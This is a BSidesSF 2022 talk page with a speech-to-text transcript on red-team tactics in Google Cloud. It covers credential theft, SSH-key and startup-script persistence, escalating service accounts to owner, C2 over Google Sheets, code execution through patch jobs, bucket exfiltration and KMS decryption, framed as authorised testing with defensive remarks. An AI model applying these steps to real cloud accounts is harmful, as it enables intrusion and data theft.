← All talks

So You Think You Can Secure Your Cloud: Red Team Engagements in GCP

BSidesSF · 202250:41527 viewsPublished 2022-07Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
TeamRed
StyleTalk
Mentioned in this talk
About this talk
Brad Richardson • Madhav Bhatt - So You Think You Can Secure Your Cloud : Red Team Engagements in GCP This is a detailed guide for adversary simulations in GCP that covers how to get an initial foothold, persist, escalate privileges, use Google's own products as C2, manipulate firewall rules and compute instances, abuse Key Management Service and Google Cloud Storage to decrypt and exfiltrate data. Sched: https://bsidessf2022.sched.com/event/rjrR/so-you-think-you-can-secure-your-cloud-red-team-engagements-in-gcp
Show transcript [en]

all right everyone uh we are ready to start our next talk our next speaker uh will be brad uh brad richardson and mother motherboard brad is here to talk about very easily to talk about uh the rig team engagement in gcp let's take it away thank you all right good afternoon b-sides thanks for joining me this week red team engagements in gcp and uh we'll be talking about what it's like to do a red team engagement in gcp um a lot of it will come from taking our typical attacker objectives the tactics that you know any red team finds itself walking through and we'll be applying it to resources that uh are unique to gcp

um a lot of what you'll see is kind of what i call uh living off the cloud so you've heard of living off the land this is more living off the cloud so we'll be taking normal functionality and we'll be using it red team style and i just want to point out that mottobot would have been here he had a personal conflict we would have co-presented this together i know he was super bummed that he couldn't be here with us today a lot of what you're going to see he uh he's directly contributed to it a lot of this material uh comes from him i'll also be talking about a tool that we co-wrote together

uh but even a lot of that is his evil genius i want to make sure that he gets proper credit so just jumping in a quick disclaimer a lot of what we do even though we're professional red teamers is done on our spare time it's our own views that we've developed over uh several years doing uh red team engagements um both for like uh with the government uh also you know just typical corporate but what you see not necessarily reflects anything from our employer but really just what comes out of a lot of our own personal research personal tool development that kind of thing um so with that out of the way uh who am i of course i'm brad

richardson i tweet at jb uh i'll offset engineer currently at credit karma i like to blog things i think are practical useful to the security community uh at medium and probably my most recent tool at least the one that i'm uh kind of proud of is called slackhound it's a reconnaissance tool for red teams uh for slack workspaces so check that out and uh i'll introduce motto uh he tweets at desi jarvis also we work together he's an offset engineer at credit karma as well um blogs at medium writes uh tools himself and he's a contributor to a red atomic red team so i said that we would be walking through typical tactics phases that any

red team would go through in this case unique to gcp um that's exactly what we'll do so we'll orient ourselves a little bit to gcp we'll walk through a little bit of an initial foothold we'll go through persistence privilege escalation command and control lateral movement and we'll finish off because uh normally you know we need to do all of these things to accomplish our objectives but often more times than not our objective is about data we'll talk about data and decryption exfiltration so just a little bit of gcp 101. so if you're into pictures gcp kind of looks like this from an attack perspective especially so at the top level you have your organizational node

that might be you know your domain redteam.com below that you may have suborgs and below that projects and really projects is where your resources are going to be under where the magic's going to happen when i say resources you think of your compute your storage secret management network those types of things and uh if pictures aren't your thing and lists or more your style this is the same thing in uh list so you have your organization at the top your projects will fall under that in larger enterprises you may encounter folders uh folders are you know i think of those of as ways of just organizing like your iam permissions maybe you think of like

having uh departments um those fit neatly up under folders but you don't have to have folders for uh gcp but you definitely have to have projects and under the projects like say will be your resources so we'll jump into a little bit of initial foothold uh i won't spend too much time on this hopefully if you are doing red team engagements you know you're at a maturity level where you're spending the majority of your engagement in other attack phases so you get the most information kind of across for the board if you're spending a lot of time in initial access you're um you know you're trying to do fishing you're trying to at that point

prove uh maybe that more of an attacker or advanced attacker can get into the environment then you may be losing uh time time is money and data from how you know your defenders respond in those other parts of the kill chain but uh with that said you know there's nothing wrong with working initial uh getting an initial foothold a lot of good data does come out of that so uh i wouldn't want to leave you without some information in this attack phase one thing you know i mentioned phishing if you are using this attack vector definitely check out a write-up by cedric owens he talks about how to get a tool called evil jinx up

and running uh evil jinx really makes fishing a lot easier especially you know if your organization is using identity portals like office 365 or octa could be any of those sas based identity portals um evil jeans makes this easy uh you would still do your uh typical fishing but the ban and middle attack takes a lot of the pain out of phishing where you're you know you're you're trying to set up a site scrape a lot of uh css make it look legitimate well the man in the middle attack will do what you want which is you know capture those username password credentials potentially bypass qfa and get you a valid session into that portal

one thing to be on the lookout because it's gcp probably familiar red teams are always looking for credentials maybe in uh you know if you're doing aws maybe an s3 bucket if you've compromised endpoints during your red team operation you're looking at traditional things keys and and different types of secrets and and you're looking for specific file extensions that'll you know maybe lead to something that will help you laterally move from uh your initial foothold well for gcp look for json file extensions p12 files as well the difference being here as i like to think of them as one is more google managed keys and the other one more customer managed and uploaded and uh don't want to discount you know

traditional methods of getting initial footholds so things like ssrf vulnerabilities still come into play it doesn't matter this gcp so one other thing i'll point out on this slide is um maybe you're aware maybe you're not it's been reported to google if you're usually using programmatic access like gcloud gsutil to do a lot of automation for gcp the credentials are stored in clear text that's what you'll find under um a compromise endpoint or you know it could be even yours uh your home directory uh documents slash vcloud uh if you find credentials in there and there's an active session all you need to do as uh the red teamer download those files and you can take over that session assuming

again it's it's a valid session those you know do time out but if it hasn't you can assume that session this is not unique to gcp certainly none of what i'm saying i ever intend to pick on gcp aws and azure it's a little bit different still suffer the same kind of issues and so if you haven't heard of this uh particular uh technique uh there's a write-up uh that motto did about how to go about doing this ex-filling those databases of course if you're getting a foothold on an endpoint you at least have the privileges of that user that you know clicked on that phishing email or or whatever it is it's not going to

require root or administrator privileges um and so you'll be able to read those uh database credentials and download that should be able to and i know i have links here i think that they're going to make these slides available i've also linked to it so that you can download in pdf and all the links are available you can go out in your own spare time and read these write-ups but continuing on we won't spend too much time here but just if you're not familiar with what like service account keys look like and and credentials in gcp look how they appear and you find yourself in an engagement in this cloud environment you see this is an example here the things that

help orient you we're using gcloud and we see that we have the project that we're in so if you think about getting a foothold on an endpoint you want to get situational awareness just like you would an on-prem traditional network so you see just a few commands or looking at that that service account key to see your project and uh pretty much everything in gcp kind of looks like an email address for service accounts so you know you see that at red team project one and g surface account.com just be aware of that so we'll jump into persistence two main takeaways here what you see on the left side if you're gaining initial access via

user account or access token and you're working as a red team these are short-lived account access so red team needs to move fast if you find one of these and it's an active session whereas if your initial access comes from a service account you are good these are very long live sessions and i'll show you a little later just how long by default um but if you come across service account and that's why i point out the extensions why they're important to keep an eye out when you're doing reconnaissance where you land on an end point uh you may have just killed two birds with one stone with the ability to have your persistence and

hopefully move laterally and here what here's what you see very uh tactical examples so at the top we're working with ssh keys for persistence you see the google cloud console web-based gui and in here you have the ssh public key uh for uh the test account and below you see what it looks like from the cli so i've catted just a fake public key you see the key there and what you see in the in the red box is successfully adding using google's own built-in sdk so in this case we're using gcloud compute instances add it to the instance we want we can give it a local file in this case the public ssh key portion

and it works and tying back into the top here the key is added one thing that i want to point out is very important if you think about the the format of the public key in your traditional linux host it's a little bit different than what google expects so if you're using this method um you want to take note we have the the account the colon ssh rsa the space the key material if it's not in this format google may or may not throw an error but you'll go to log in or sshn it won't work you may not know why so i want to point that out in case you're using this method and so kind of going back to service

accounts here you see the google cloud console one thing to note is in gcp a service account can have multiple keys if you come across a service account and you see a key you obviously don't have the key but it doesn't mean that with the right permissions that you can't add additional keys you can and also i said that service account keys are long lift in this case by default they're good until december 31st 99.99 i call that long lift and so uh to me one of the funnest things about red teaming is when i can find normal built-in functionality and kind of turn it towards the advantage of the red team so in gcp

you have startup scripts that you can attach to compute instances it will execute those they can be very complicated you can also find keys and tokens as well in startup scripts just normal you know admins working to make things do what they want but we can use this functionality as well so what you're seeing again is a very simple example but it doesn't you know it doesn't really matter it will work so you know i create my example shell script here i see h modded to be executable i use again the google provided sdk gcloud command i give it the instance that i want and uh in this case i can run it i have that script locally

and it will attach that startup script and when this host uh whenever it reboots it will execute my code in this case what it's doing you see you see it there in the cloud console where it's been added and below you see root of the instance three you grab the host name and then i check to see that that file was successfully created uh cat it so it's in etsy you see beacon.sh and i just echoed the command for the example and you see the text there my beacon runs on bacon and so our startup script worked of course you know in a real red team engagement you're going to put something besides that so

you know sometimes depending on how the enterprise has architected these things maybe you don't have cli access or maybe you're just more comfortable working in more of a gui based interface no problem if you need once you have this persistence you're able to log in through whatever method thankfully gcp supports ssh login through the browser as well and uh establishing persistence on project um what you see here is um you can add even gmail accounts to a project so once you have enough iam permission and you want to add an account um that doesn't necessarily have to be an email address in your organization uh when i've tried this it uh it will complain if it is

outside of the organization's domain uh or gmail but gmail works even though you know you think redteam.com it would need to be a redteam.com address i assume that there's functionality to disable this but by default works just fine and uh google will send or gcp will send the email uh to the email address that you specify and that's what you see on the right side so i invite you to join the google developer console the project's redacted there but once you accept the invite whatever role you were granted you're good to go so uh persistence on project again just continuing i mentioned earlier you know be on the lookout for json keys once you have the right permissions you

go to create a service account uh it's going to give you the ability it's going to ask you to to download and save that json file that is the service account key uh whenever i see in any application it warning me something via fact service account keys could pose a security risk if compromised that's very interesting to me as a red teamer and so here again we're just downloading the key and now we have that persistent access

and again you see uh we're doing persistence and we can add even a gmail address in this case for the organization so even escalating our privileges a bit in the role we're setting is owner in this case however a bit of this sounds kind of uh simple right we've all seen where you're working test labs test labs are very small everything is very default um you know a large company may have thousands of projects may have you know things broken out in the folders uh using you know lots of different resources and so uh of course you need the appropriate permissions that doesn't change in the cloud from how it is on-prem you still need that

you know that level of access to do these things and so finding the right accounts finding the right compute instances just as much challenge as it is in on-prem networks so what do we do about that well we'll talk about privilege escalation but i want to um also bring up a tool that me and motto have written together um it is to it automates a lot of what you have seen in this presentation and a lot of things uh that will come um if you are in an environment where you're talking about you know hundreds thousands tens of thousands of projects lots of uh accounts and different roles um be too overwhelming for you know

maybe your red team is five people ten people uh or smaller you would burn all your your your time uh potentially trying to figure out uh who has the power in the kingdom gcp hound really helps with this so i have a link there this will take you out to medium article motto wrote it will tell you how to download gcp hound get it up and running runs in a docker container very lightweight currently it has it helps abuse iam compute project gcs kms a lot of the things i'm talking about and i'll show you examples of it as well so it queries iam in this case it it also has a gui for the iam portion i

think we will add all of the modules and all the functionality to eventually be under gui but we started with iaem because of just how do you decouple when you're talking about so much data and so that's what you see here hopefully you can see it might be a little blurry on the screen um but it just makes it more clear when you're trying to find out who has you know the roles they that you're going after it is fast and stealthy it is multi-threaded it does random sweep time to potentially throw off you know rate limiting or the blue team and so it is also customizable by default it will populate this file these are

typical uh juicy accounts that you'll probably be going after but you can change that if you find in your organization there's a particular role you know maybe it's it's custom it's unique and uh you want to add it add it in here this text file no problem and it will pull all that data in and show it in a nice gui for you to help you out so uh escalation and persistence remember we talked about service account persistence you know you can run the gcloud commands certainly some of those get pretty lengthy quite a bit to type at times gcp hound helps shorten that it also helps automate you know what we're really trying to do save us time so what

you see here gcp hound create service account key you give it the project give the service account that you want created and uh there's a couple other things that you know google gcp expects but what it is doing here is it will check to see that your session is still valid uh that you're still logged in and it's going to create some local directories for you and it will attempt to create that service account if that service account already exists you might recall we can have multiple service account keys it'll go ahead and download that key store it for you so that you have it to use and a little bit of automation so of course if we can become

owner let's become owner and gcp hound as it does uh the first part of that it'll also go ahead assuming it has the right permissions it will attempt to put you in the owner role as well for that service account and what you see here it's a bit redacted but you see the green box it was successful up here and you see kind of validating it in the cloud console um our service account that we created as owner and you see we got a nice 55 78 out of 55 78 xs permissions so we'll jump into a little bit of command and control you know not every engagement requires that you establish c2 but it's always nice to have

so if you're doing red team engagement in gcp and let's say you're working in a really restrictive environment well i'll leave you here with two potential options the first one is to use google sheets so i wrote in medium post and i also put it out in my personal github some python code that helps you establish c2 using a google sheet what i like about this is that you know it's a little harder for google to block google so gcp back to a google doc by default of course it runs over https so our channel is encrypted we didn't have to do anything special for that if you go to go this route it really only requires a couple things

to get up and running the nice thing about sas is it helps us out here so you need python you need a gcp service account that gcp service account doesn't need to be privileged i don't think it even needs to be in the project that you're targeting you just need a gcp service account and of course you need a google sheet and you will need to enable the google sheet api to get this working but other than that you don't really need anything else and uh if you check out the python code that i put out in github um you know it's not going to be as full feature to something like mythic or cobalt strike but it doesn't

mean that you can't do your initial reconnaissance establish situational awareness and then uh i built in a you know a command so that it will download whatever you point it to it's not going to use curl it's more uh python cis internal so it's a little bit stealthier than running you know uh running something on the command line to download uh potentially you know a payload that you want to use to upgrade your c2 from this to something more full-featured but there's also dns cat 2. i didn't write that i did put the author up there this works really well if you find yourself in a super restricted environment acls are really locked down you can't you know make it out to the

internet on any it doesn't seem like you make it out to any uh tcp or gdp port from a project because it's that restricted well normally you know typical dns functionality uh google will help you out by forwarding you know the the client queries outbound the internet and so that may be an option for you so i did say that you need to enable google sheets api and create a service account these are really simple to do in gcp and an example of what it looks like with my python based uh c2 over google sheets so what you see up here in the top portion is just running the python client it is calling out to

that google sheet uh if you're familiar with a google sheet the same way that you share a sheet with a person normally looks like a an email address right well so remember we talked about how the service accounts look like an email address we just take our service account id and share it with that and then our sheets here you know i've added a couple columns to make it just more manageable you see c2 command command output timestamp so the client reads from that cell very simply grabs the who mi executes it up here we see that it's root it'll automatically go to the next row so it catches seos release we get our situational awareness

we see kind of the operating system where we're working from and we can do you know curl dash version and we see that there and it timestamps each of it each command that it runs which is always helpful the red team because you know we're trying to manage the red team log and be able to go back later and say you know what was the host and when did we execute it so this helps with that too we'll dive into lateral movement so by default every compute instance in gcp has a [Music] compute default service account attached to it now this can be customized this can be changed but just talking defaults in large environments

especially you might find variations of this by default that account is it has the editor role however this does not mean that you know you can use all of those permissions so if the account has an active token the session you're trying to abuse what you see here is we can run a few simple gcloud commands and sort of orient this to the host that we're on so gcloud auth list project swiss projects get an iam policy and what you see in the screenshots is uh that being ran so you see in the the red box at the top that tells us that the host that we've landed on is using that compute default service

account and then you can curl the metadata server from the compute instance just like you see here and that will come back with your access scopes so kind of two things determine what you can what apis you can query in gcp from say a compute instance and um so iam permissions are only half the battle what you see here is actually pretty restricted the access scopes determine you know what we can do with those other cloud resource apis by default it is pretty restricted so you see you know you have some read-only permissions for storage and monitoring trace append but if you land on a compute instance and you have that editor role and you

query and find that you have access goes like for example if you see cloud dash platform or a whole lot of additional permissions like just got a lot better that means you have a lot more access so i wouldn't want to leave windows out gcp obviously supports windows not everyone is in a linux environment um here we are targeting a windows host let's say in our red team engagement you know all of the data that we're after whatever the objective is is on a windows host using the gcloud command we can use gcloud compute reset windows password give it the instance name the zone in the user account now if that service account does not exist we have

the right iem permissions this is all we need to create that service account gcp will do this very easily for us and it will also drop it into the local windows administrator group it returns us the password that you see uh in here and we're good to go if we're targeting an account that does exist we know it exists from reconnaissance or some other means we do the same thing it'll change the password it'll give us a password and we're good to go so again i love it when we can take normal gcp functionality and use it for red team purposes what you see here gcp includes the ability to patch our gcp instances at scale you can

set up patch jobs so that you know if you want to target one say linux compute instance you can if you want to target all linux compute instances you can you you know whatever subset if you're really gutsy not worried about triggering alarms you can tell it everything in the project but in this case what you see is we're using gcp hound to make it a little bit easier we give it an instance just like with normal gcp functionality we can specify a local file we can specify a file that's in a google cloud storage bucket and what we can do is we'll run our past job we'll patch the compute instance just like an admin would except we'll

also run you know our code we can use a script apply it to the compute instance the only thing about it is is like with normal patching it probably will reboot the compute instance but it's fairly stealthy and so you know sometimes your admins will be like why did the host reboot oh well looks like it uh you know there was a cron job or something happen we see that what it did was it was uh just patching so that's why it rebooted we'll you know we'll make a note of it so you might get through even though it rebooted as a red team and what you see down here in the cloud console is you

see the past job uh was successful so it patched the host from my past job patchy real good and uh it would have executed our uh our code as well uh pretty stuffy a stealthy method uh one thing i'll point out here is if you use this method and you supply a gcs location so you have your your script that you want to run on the host you need to turn on versioning this was not very clear to me at first and i kept wondering why the past job was failing if you call a script in gcs versioning needs to be turned on or you know it won't work so back to lateral movement in

using ssh keys what you see here is uh we're using gcloud again uh we can we can modify the metadata for the project of course we can do that with the compute instance as well when we saw that if you're if you're using gcloud or gcp hound to add an ssh your ssh public key it's a compute instance you see that in the metadata for the compute instance in the cloud console in this case we're looking at the project uh what i point out here is what makes this particularly cool is if we add it to compute instance well we can ssh into that computing but if we add it to the project then we can ssh into every compute

instance in that project now i'll point out that there's a way kind of to defend against this you can set in the compute instance to ignore keys but generally you're probably not going to find that to be the case and one other thing is if you add your ssh key to the project metadata then not only do you have ssh access into your running instances already but you know an admin goes in tomorrow the next day builds more compute instances you'll have access to those as well and i said earlier that um you know when doing c2 firewall rules may be restrictive may find yourself in a particular signific environment but this is kind of what it looks like by default

so you may not and so you see if you just go build a standard project this is what your firewall firewall rules will look like so you see ingress rules here icmp all tcp ports all udp ports and default rules for 33 89 and 22 for ssh doesn't mean that admins can't restrict this tighten these rules up use least privilege of course they can of course they should we're there to help the defenders defend better but just to show you what it would look like by default and gcloud compute ssh this is a particularly nice feature in gcp so you think about normally ssh into typical linux box well you can use gcloud compute ssh and you see up there

in the red box we give it the instance name we give it the zone assuming we have the right iam permissions it will ask us for the pass rate of print passphrase of our key assuming we've set a passphrase for our key and we're in we don't have to have an external ip address this is a difference between your traditional on-prem networks versus the cloud in this case you know on-prem network we might need to set up some netting rule firewall rule to route from external to internal google gcp takes care of this for us assuming we have the right permissions the instance i used in this example did not have an external ip address or

ephemeral ip address only an internal but i have the right id and permissions to actually use this gcloud command and i'm able to sshn one other thing that i'll point out here is you see the red box around the 35 235 340 ip address well that's on my home ip address or external ip that's google's ip address so i get a little extra stealth out of this i didn't have to do anything for it if someone's looking at who logged in and from where well looks like i logged in from google and last section we'll talk about data exfiltration and decryption the other sections you know those are things that red teams have to do those

are the tactics that we typically walk through to eventually be able to action on objectives more times than not the real objective you know has something to do with data right so we're trying to test the assumption that a determinant attacker could get to wherever the data is kept you know could they read the data could they modify the data could they exfil the data so a lot of times it's all about the data so here uh you see we're using gcp hound a couple of different functions that miyamoto have added to make this uh more simple less to type so gcp helm bucket list an x fill bucket so again you're working in a big

environment could be you know hundreds thousands of buckets could be lots of objects in those buckets uh you know a lot of times where teams are drinking from a fire hose you know there's so so much to go through red teams you know aren't exactly like a nation state where you know you think about a red team opera airplane hangar uh usually red teams and corporate environments are pretty small and uh it's tough right so gcp hounds through that data a lot more quickly so you see where uh we think we've come across a project that project looks interesting we can use bucket list gcp hound will check that our session is still valid make sure we're still logged

in and it will pull a list and it will start querying everything in gcs for that project and what you see here is in my test environment that i've created it is pulling all of the available buckets and downloading them to my local machine and uh so there's your listing and there's your x filling all made simple of course you know the data may be encrypted we need to decrypt it otherwise it's useless in google you have kms you know that typically helps you encrypt the data gcloud of course has commands to both encrypt and decrypt the data to you know store your keys create your key rings but what you see up here although a lot

of it is redacted of course we can do you know traditional things like when we cap the data and we see we would see that the data is encrypted we can type out these very long tcp from key cloud commands and they work of course and once we find the right key from the right key ring we can decrypt the data again if you're in a very large environment it would take a lot of time gcp helm root decrypt we just need to give it the project id give it the key ring region and the file that we want so it doesn't matter how big the environment is uh it again checks to see that the session is valid that we're

logged in it will go out and based on that those few parameters we had to specify we gave it the the key ring and you see with the green box around it's trying the keys from that key re and it will try every key until it finds the right key for the data you want decrypted once it does you see decryption successful and it stores the output there locally for us and of course i put a just a b in that file but basically showing that the file was successfully decrypted and so just kind of closing remarks uh we went through things that i think are practical um things that red teams can do to live off the cloud take the

resources that are there and use them from a red team's perspective we talked a lot you know around compute a little bit around like kms and encryption gcs there's a lot more right that we didn't cover this was just a subset gcp is really powerful a lot of resources and functions you think about cloud function secret management firewall policies we really just scratch the surface but hopefully those examples were very practical and down to earth and if you're starting a red team engagement in gcp maybe you haven't done one before or maybe you have and you just wanted to see you know what's an approach that you know another red team might take hopefully that's been helpful

and kind of just thinking about cloud security and i talked about g-cloud compute ssh how you didn't have to have an external ip address um but you would still in some cases uh it would create an iap tunnel for you allow you to ssh in you know we we have to kind of think about the security issues we had in on-prem traditional networks and how they might be the same in the cloud or they might be a little bit different our job as a red team is to validate assumptions don't just assume that the security controls that we're helping to build helping to mature uh work of course not picking on security vendors but they always work according to the

security vendors but we have to test those we can't take it for granted because we want to make those security controls stronger and validation is part of that so be careful cloud infrastructure may not be any more secure than the on-prem version that you had before the cloud provider may or they may not provide the basic security controls you know ipy listing very basic been around a long time don't assume that you know that it's just taken care of for you or that it even you know can be done in some cases and of course you know it's 2022 a lot of these things seem like stuff that you know we as a security industry

should have fixed a long time ago but not necessarily so you assume that any car you buy in 2022 comes with airbags we can't assume just because it's 2022 and we're in the cloud the things are just naturally by default more secure you heard me talk about a lot of configurations in in the way that it's set up when it's default and how it can be abused well just don't take anything for granted and uh with that i appreciate everyone coming out and uh listening to the talk allowing me to share some information um hopefully you found it helpful big thanks to besides sf uh for allowing me to share as well and if we have any time

left happy to take questions or if you'd like to chat afterwards happy to do that as well [Applause]

yeah i saw one of the first inspectors was creating a new service account are there any artifacts like email artifacts that happen when those

yeah so the question was is when you're using or creating service accounts potentially for persistence are there any artifacts left around such as like an email you saw on one of the screenshots where uh you get the email uh in one case um to accept you know that invite um from what i've seen it's actually an option so you can tell it not to if you're trying to be particularly stealthy and not generate that email or you can generate the email is it an artifact in that case i would say it is especially in the case where let's say that you've compromised an employee account and you have access to their email and you generate that artifact now

an attacker could set up a rule so that that email goes into trash very quickly but that's still an artifact right absolutely and you could potentially a word on that cool thank you yep

thanks so much um i have a question about the os patching management i'm not that familiar with that feature so i'm just wondering is there possible to for the admin to configure to check integrity or often authenticity of that patch to avoid the attack that you just explained so the the question is is could an admin potentially check the integrity of the patch um so i believe that is the case however it becomes um in my mind uh detection versus prevention so uh when we create a a script that we're going to attach to the compute instance and run after the the patch job uh you know completes um as far as i know you

would not be able to by default uh functionality that's built in be able to detect or be able to check the integrity of the script that you're running without kind of creating something custom as far as i know in the example that you saw i did not tamper with any of the actual rpms in the past job that were pulled down i just created my own pre and post patch uh script to run so as an attacker probably what i would do is then go and see if i could remove that pass job of course as red teamers i don't really like to remove the artifacts i want to leave it there for the blue team to potentially investigate

hopefully fine but the best i can answer your question i don't think it would be an integrity issue unless you built something it could be wrong but that's what i think how about the authenticity like do is that possible to configure so for example you need to init some signature uh in a patch and check the signature to make sure that it's from the legit or region so if if you're uh wanting to check the integrity of like for example the rpms will be pulled down and installed yes uh you can check the integrity of your rpms you can limit uh just you know typical patching you would want to do that anyway or i

would want to do that so that no rpms got installed it didn't come from validated verified rpm repos yeah thank you